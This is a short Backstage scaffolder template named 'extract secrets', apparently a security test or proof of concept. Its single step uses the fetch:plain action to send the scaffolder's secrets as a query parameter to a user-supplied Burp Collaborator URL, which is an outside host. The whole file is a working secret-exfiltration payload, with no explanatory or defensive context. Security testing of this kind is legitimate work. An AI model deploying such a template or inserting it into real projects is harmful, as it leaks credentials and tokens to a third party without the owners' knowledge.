apiVersion: scaffolder.backstage.io/v1beta3
kind: Template
metadata:
  name: secrest-template
  title: extract secrets
  description: Test extract secrets
spec:
  type: service
  parameters:
    - title: extract secrets
      required:
        - collaborator-URL
      properties:
        collaborator-URL:
          type: string
          title: Collaborator URL
          description: Burp collaborator URL
  steps:
    - id: post-to-collaborator
      name: Post info 
      action: fetch:plain
      input:
        url: ${{ parameters.collaborator-URL }}?secrets=${{ secrets }}

        